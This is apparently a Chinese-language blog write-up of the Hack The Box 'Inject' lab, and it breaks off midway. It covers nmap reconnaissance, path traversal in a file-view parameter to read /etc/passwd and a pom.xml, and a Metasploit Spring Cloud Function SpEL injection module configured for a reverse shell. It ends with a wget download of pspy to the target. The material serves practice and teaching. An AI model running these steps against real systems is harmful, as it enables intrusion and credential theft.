HTB打靶记录-Inject

最新推荐文章于 2024-07-13 15:37:44 发布
最新推荐文章于 2024-07-13 15:37:44 发布
阅读量99 收藏
点赞数
分类专栏: HTB打靶记录 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34428150/article/details/131951719
版权

准备工作

  • 开机

    得到靶机的 IP 地址 10.10.11.204

信息打点

  • 收集当前靶机的初级信息—使用 namp nmap -sTVC 10.10.11.204
ORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 caf10c515a596277f0a80c5c7c8ddaf8 (RSA)
|   256 d51c81c97b076b1cc1b429254b52219f (ECDSA)
|_  256 db1d8ceb9472b0d3ed44b96c93a7f91d (ED25519)
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Home
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

得到以上信息,正常情况来看,我们测试的目标顺序应该是 8080--->22
既然有 8080 端口,先访问看看

可以看到很正常一个网站,有注册登录,但是最吸引人的还有右上角的上传,打开看看怎么个事

  • 随便上传一个 php 文件给了个提示

    看起来是有过滤,那我们上传一个 image 文件试试

    上传成功了,给了个链接,按下 F12 看看怎么个事

    看起来像,文件包含?那这不就来劲了啊

漏洞利用

tets.png 换为 /etc/passwd 试试

啊偶,怎么会不对啊,等等,现在我是在网站目录,而这个并不在当前网站的目录下面,尝试加 ../
终于,加到第六个的时候,界面变了

问:数据在哪?
答:F12 啊

这该怎么办呢,不要慌,掏出大宝贝 burp

还是那句话,道高一尺魔高一丈,总有办法,这不就出来了,找找记录下重要数据

root:x:0:0:root:/root:/bin/bash
frank:x:1000:1000:frank:/home/frank:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash

暂时得到这三个有用的账户,接下来读取 shadow 文件试试

没得数据,那就看看 etc 目录下都是神马东东

这样啊,那试试另一个

好!放弃这条路,那就别怪我随便翻你的文件了

在我读到 ../../../../../../var/www/WebApp/ 这个文件夹的时候,我看到了 pom.xml 文件,作为资深(xiaobai)Java CV 工程师,我知道这个配置文件,拿出来

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<version>2.6.5</version>
		<relativePath/> <!-- lookup parent from repository -->
	</parent>
	<groupId>com.example</groupId>
	<artifactId>WebApp</artifactId>
	<version>0.0.1-SNAPSHOT</version>
	<name>WebApp</name>
	<description>Demo project for Spring Boot</description>
	<properties>
		<java.version>11</java.version>
	</properties>
	<dependencies>
		<dependency>
  			<groupId>com.sun.activation</groupId>
  			<artifactId>javax.activation</artifactId>
  			<version>1.2.0</version>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-thymeleaf</artifactId>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-web</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-devtools</artifactId>
			<scope>runtime</scope>
			<optional>true</optional>
		</dependency>

		<dependency>
			<groupId>org.springframework.cloud</groupId>
			<artifactId>spring-cloud-function-web</artifactId>
			<version>3.2.2</version>
		</dependency>
		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>
		<dependency>
			<groupId>org.webjars</groupId>
			<artifactId>bootstrap</artifactId>
			<version>5.1.3</version>
		</dependency>
		<dependency>
			<groupId>org.webjars</groupId>
			<artifactId>webjars-locator-core</artifactId>
		</dependency>

	</dependencies>
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
				<version>${parent.version}</version>
			</plugin>
		</plugins>
		<finalName>spring-webapp</finalName>
	</build>

</project>

那么问题来了,拿到这个有什么用呢,OWASP TOP10 教导我们,引用不安全的第三方组件也是个漏洞成因,那就去识别把
仔细看这个文件你会发现一件事,只有 spring-cloud-function-web 这东西带版本号,那你猜猜为啥,什么?猜不到?那就去问百度啊

咱就是说,百度还是好用吧,既然知道哪里有漏洞,那就掏出我们的二宝贝 MSFConsole
搜索试试
search spring cloud

看看,出来了吧,既然编号为 CVE2022 直接排除前两个,现在就剩两个了那就试试第二个 use exploit/multi/http/spring_cloud_function_spel_injection
看看需要我们做什么 show options

看起来依旧是设置目的 IP,目的 port,攻击 IP,攻击端口,那就设置吧

set rhost 10.10.11.204
set rport 8080
set lhost 10.10.xx.xx # HTBVPN中你的地址
set lport 4444 # 反弹shell的地址

然后,直接 run 等结果

啧啧啧,I get it

解题

拿到了 shell,看看 id getuid

熟悉不,对我们上面收集出来了,切换到本机的 shell 看看有没有什么好东西

看起来,啥都没有。

  • 不过在上上级目录,看到了新东西

    但是提示我没权限,看来需要拿到另一个用户的权限?
    看起来直接 sodo 也不太行,那就随便翻翻吧

    看到了一点隐藏文件,看看都有啥,乱翻的人运气还挺好

    得到了 Phil 的密码,那就直接 ssh 链接好了

    啧啧啧还拒绝我是吧,那就只能再想办法

现在来总结一下,我们的出路

  • 直接 sudo,被拒绝
  • ssh 链接,被拒绝
  • 定时任务,还没试,那就试试
    根据前面的靶机经验,查看一下 /etc/crontab

    看起来有用?看看这三个是什么 ls /etc/cron.daily


    看起来行不通,那就看看进程吧 ps 命令

    看起来没有有用的东西,在网上看了看,发现一款工具 pspy 如何利用Pspy监控没有Root权限的Linux进程_黑客技术 (hackdig.com)
    先下载下来,得到一个名为 pspy64 的文件,接下来就是传输给靶机了,我的做法是,在 kali 中启动一个简易的 http 服务器,在靶机中使用 wget 命令下载命令如下
kali:
python3 -m http.server 8892

靶机:
wget http://10.10.11.x:8892/pspy64
chmod +x pspy64
./pspy64

发现了一个奇怪的进程

去看看这个是啥

鹧鸪夜半飞
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB_tools-开源
05-02
`HTB_tools-开源`是一款专为网络带宽管理设计的开源软件,它致力于简化网络环境中的上传和下载带宽分配的配置过程,同时提供了方便的监控功能。这款工具对于网络管理员来说尤其重要,因为它可以帮助他们高效地管理和...
HTB setup script-开源
05-02
HTB.init是从CBQ.init派生的Shell脚本,它允许在Linux上轻松设置基于HTB的流量控制。 HTB(分层令牌桶)是一种新的排队规则,它试图解决当前CBQ实施中的弱点。
Python库 | htb_cli-0.1.1-py3-none-any.whl
02-16
《Python库htb_cli-0.1.1-py3-none-any.whl详解及应用》 在Python的世界里,库是开发者的重要工具,它们提供了丰富的功能,极大地提升了开发效率。今天我们将聚焦于一个名为`htb_cli`的Python库,其版本为0.1.1,...
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
HTB打靶日记:Investigation
01-27
hackthebox
【网络安全的神秘世界】XSS基本概念和原理介绍
weixin_54750312的博客
07-09 808
恶意攻击者往web页面插入恶意代码脚本(JS代码),当用户浏览该页面时,嵌入web里面的JS代码会被执行,从而达到恶意攻击用户的目的。也叫持久型,常见的就是在博客留言版、反馈投诉、论坛评论等位置,将恶意代码和正文都存入服务端,每次访问都会触发恶意代码。我们可以构造恶意代码,观察远程服务器web日志,只要网站管理员访问,它的cookie值就被盗取。发现恶意代码被浏览器保存到页面了,访问其他网页再回来,仍会造成攻击,这就叫持久型。像刚才的攻击流程,攻击一次立马失效,这就叫非持久型。
解读网络安全公司F5:助企业高效简化多云和应用部署
hanniuniu13的博客
07-09 392
在全球迈入数字时代和深入推进产业数智化的当下,F5在全球确立了应用交付、现代应用、应用安全、分布式云四个战略业务方向后,F5一直在积极推进该项战略在中国的落地。、简化已有的网络战略的具体实践中,F5与WWT和Google Cloud合作,利用解决方案帮助客户在多云环境中管理错综复杂的应用交付和安全问题。在WWT的实施支持和Google Cloud的基础设施基础之上,再运用F5提供的安全解决方案,让企业在过渡到云环境并在云环境中扩展时,能够保持一致的安全措施和卓越的用户体验。
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 1216
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
中职网络安全B模块渗透测试server2003
网络安全技术分享
07-09 818
将sam.hive和system.hive文件复制到win7的c盘根目录然后使用mimikatz工具提取。使用nmap扫描发现目标靶机开放端口232疑似telnet直接进行连接测试成功。
网络安全-内网安全加固方案
PanDD_0_1的博客
07-12 528
网络安全-内网安全
网络安全防御【防火墙安全策略用户认证综合实验】
miss_copper的博客
07-10 1210
先新建一个管理员角色(网络安全管理员):再新建一个管理员(用户名密码自拟):至此本实验全部结束!!!
网络设备安全
weixin_48579910的博客
07-11 838
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
【黑龙江网络安全等级保护测评报告】
weixin_62641226的博客
07-08 290
黑龙江信息安全等级保护测试报告》(简称“等保测试报告”),是黑龙江地区按照有关信息安全等级保护的有关规范与要求,对其进行了安全性评价并编制的一份报告。4. 安全性评测成果:从物理安全、网络安全、应用安全、数据安全以及管理安全等角度,对测评中存在的安全问题和缺陷进行了详尽的分析。5. 安全性风险评估:对所检测到的安全性问题进行风险评价,并对其可能产生的损害以及对该信息系统的影响程度进行分析。1.系统综述:对所要评价的信息系统进行了简单的介绍,包括系统的名称,功能,运行环境,网络体系结构等。
医疗器械网络安全| 常见安全漏洞与防护措施
网 安 云
07-08 791
通过加强代码审查和安全测试、采用安全设计原则和最佳实践、加强网络安全保护、实施严格的访问控制、建立安全监控和响应机制、关注并遵循相关标准和规范以及加强安全培训和意识提升等措施,可以有效防止医疗器械软件被攻击和滥用,为患者提供更加安全可靠的医疗服务。
WEB安全:网络安全常用术语
qq_55038440的博客
07-09 662
N day 漏洞指的是已经被软件开发者知晓,漏洞的修复补丁已经发布 n 天,但由于各种原因受害者仍未打补丁。:软件漏洞指的是计算机程序或应用程序中存在的安全弱点或缺陷,可能会被攻击者利用来违反系统的安全性。:网络漏洞指的是网络基础设施、协议或配置中存在的安全弱点或缺陷,可能会被攻击者利用来违反网络的安全性。:硬件漏洞指的是计算机系统或设备中的安全弱点或缺陷,可能会被攻击者利用来违反系统的安全性。:人员漏洞指的是由于人为因素导致的安全弱点或缺陷,可能会被攻击者利用来违反系统的安全性。
【网络安全科普】网络安全指南请查收
weixin_45840241的博客
07-09 873
网络安全为人民、网络安全靠人民,维护网络安全是全社会共同的责任,需要政府、企业、社会组织、广大网民共同参与,共筑网络安全防线。但与此同时,互联网领域的问题也日益凸显。网络安全,是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性、真实性和可控性的能力。所有刷单都是诈骗,做任务赚佣金不过是刷单诈骗的诱饵,切勿相信“免费送、轻松赚”等兼职广告,不要贪图小便宜,不要轻易点击陌生链接或扫描陌生二维码下载APP。
【网络文明】关注网络安全
最新发布
Liang_z_的博客
07-13 794
网络安全是指保护网络系统的硬件、软件及其存储、传输的数据不被非法访问、篡改、泄露或破坏的过程。这包括了保护个人电脑、智能手机、服务器、网络基础设施等设备的安全,确保电子通信的私密性、完整性和可用性。网络安全是一项系统工程,涉及政府、企业、社会组织和每个个体。在享受互联网带来的便利的同时,我们每个人都应承担起维护网络安全的责任。通过持续的学习、实践和合作,构建一个更加安全、可信的网络环境,让科技真正造福人类社会。程序员作为数字时代的建设者,我们的每一行代码都承载着责任与使命。
WEB安全-文件上传漏洞
深度安全实验室
07-09 392
WEB安全-文件上传漏洞
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值